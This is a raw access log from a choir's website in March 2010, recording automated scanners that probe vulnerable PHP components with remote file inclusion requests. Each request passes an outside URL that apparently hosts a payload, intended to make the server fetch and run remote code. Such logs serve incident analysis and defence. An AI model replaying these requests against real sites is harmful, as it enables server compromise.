210.204.38.42 - - [09/Mar/2010:04:48:51 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:49:06 -0800] "GET /skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:49:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:49:07 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:49:55 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:49:59 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:07 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:07 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:07 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:34 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:34 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:50:35 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:50:55 -0800] "GET /skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:50:55 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:50:55 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.234.201.2 - - [09/Mar/2010:04:50:56 -0800] "GET /bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.234.201.2 - - [09/Mar/2010:04:50:56 -0800] "GET /logs//bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
77.234.201.2 - - [09/Mar/2010:04:50:56 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php/?board_skin_path=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:51:01 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:51:22 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:51:22 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:51:22 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:51:24 -0800] "GET /logs/access_100117.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.145.178 - - [09/Mar/2010:04:51:24 -0800] "GET /logs/access_100130.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.145.178 - - [09/Mar/2010:04:51:24 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.145.178 - - [09/Mar/2010:04:51:25 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:51:59 -0800] "GET /logs/access_091229.log%20%20//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:03 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:04 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:04 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:52:07 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:09 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:10 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:10 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:10 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:16 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:16 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:16 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:29 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.12.122 - - [09/Mar/2010:04:52:38 -0800] "GET /logs/access_100126.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:42 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:42 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:43 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:58 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:59 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:52:59 -0800] "GET /logs/access_091229.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.91.20.147 - - [09/Mar/2010:04:53:14 -0800] "GET /logs/access_100112.log//zboard//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.91.20.147 - - [09/Mar/2010:04:53:14 -0800] "GET /logs//zboard//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
201.91.20.147 - - [09/Mar/2010:04:53:14 -0800] "GET /zboard//include/mail.inc.php?skin_board_path=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:53:35 -0800] "GET /skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:53:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:53:35 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:53:49 -0800] "GET /logs/access_091229.log%20%20//skin/zero_vote/error.php?dir=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:54:09 -0800] "GET /skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:54:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:54:10 -0800] "GET /logs/access_100214.log%20%20//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:54:32 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.217.216.132 - - [09/Mar/2010:04:54:33 -0800] "GET /logs/access_091229.log%20%20//skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//icon/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:54:33 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:54:33 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
74.52.122.70 - - [09/Mar/2010:04:54:43 -0800] "GET /?option=com_frontpage&task=§ionid=&id=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 200 1724 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
74.52.122.70 - - [09/Mar/2010:04:54:44 -0800] "GET /?option=com_frontpage&task=§ionid=&id=&mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 200 1724 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.americanboyschoir.com"
74.52.122.70 - - [09/Mar/2010:04:54:44 -0800] "GET /logs//?option=com_frontpage&task=§ionid=&id=&mosConfig.absolute.path=http://www.aqvivo.de/dua?? HTTP/1.1" 200 1086 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.americanboyschoir.com"
74.52.122.70 - - [09/Mar/2010:04:54:44 -0800] "GET /logs//?option=com_frontpage&task=§ionid=&id=&mosConfig.absolute.path=http://www.spread.xx/xx.xx??&u=x HTTP/1.1" 200 1086 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:55:01 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.204.38.42 - - [09/Mar/2010:04:55:21 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:55:47 -0800] "GET /logs/access_091229.log%20%20//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:03 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:03 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:03 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:04:56:06 -0800] "GET /logs/access_091229.log%20%20//skin/zero_vote/error.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/zfxid1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:09 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:21 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:21 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:21 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:21 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:23 -0800] "GET /lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:23 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:23 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:56:24 -0800] "GET /logs/access_100214.log%20%20/lostpasswd.php?env[include_prefix]=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.250.255.243 - - [09/Mar/2010:04:56:54 -0800] "GET /logs/access_100305.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:04:57:15 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:04:57:15 -0800] "GET /logs/access_100112.log//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:04:57:16 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:04:57:16 -0800] "GET /logs/access_091229.log//agendax/addevent.inc.php?agendax_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:57:29 -0800] "GET /nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:57:29 -0800] "GET /logs//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:57:29 -0800] "GET /logs/access_100202.log%20%20//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.145.178 - - [09/Mar/2010:04:58:01 -0800] "GET /logs/access_100210.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:58:22 -0800] "GET /logs/access_100117.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:04:58:53 -0800] "GET /logs/access_100117.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:16 -0800] "GET /nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:16 -0800] "GET /logs//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:16 -0800] "GET /logs/access_100202.log%20%20//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:04:59:23 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:04:59:23 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:04:59:23 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:04:59:25 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:04:59:25 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:04:59:25 -0800] "GET /logs/access_100205.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:29 -0800] "GET /logs//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:29 -0800] "GET /nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
87.106.132.3 - - [09/Mar/2010:04:59:29 -0800] "GET /logs/access_100202.log%20%20//nologa/board/delete_all.php?board_skin_path=http://sconlinedesign.com/columbus/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:05:00:05 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:05:00:05 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:05:00:05 -0800] "GET /logs/access_100116.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:05:00:18 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:05:00:46 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
222.122.197.10 - - [09/Mar/2010:05:01:20 -0800] "GET /logs/access_100116.log%20%20//components/com_flyspray/startdown.php?file=http://nova.kahovka.org.ua/language/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:01:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.80.108.81 - - [09/Mar/2010:05:01:39 -0800] "GET /logs/access_100213.log%20%20//skin/zero_vote/error.php?dir=http://www.gk-rus.ru//tw.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
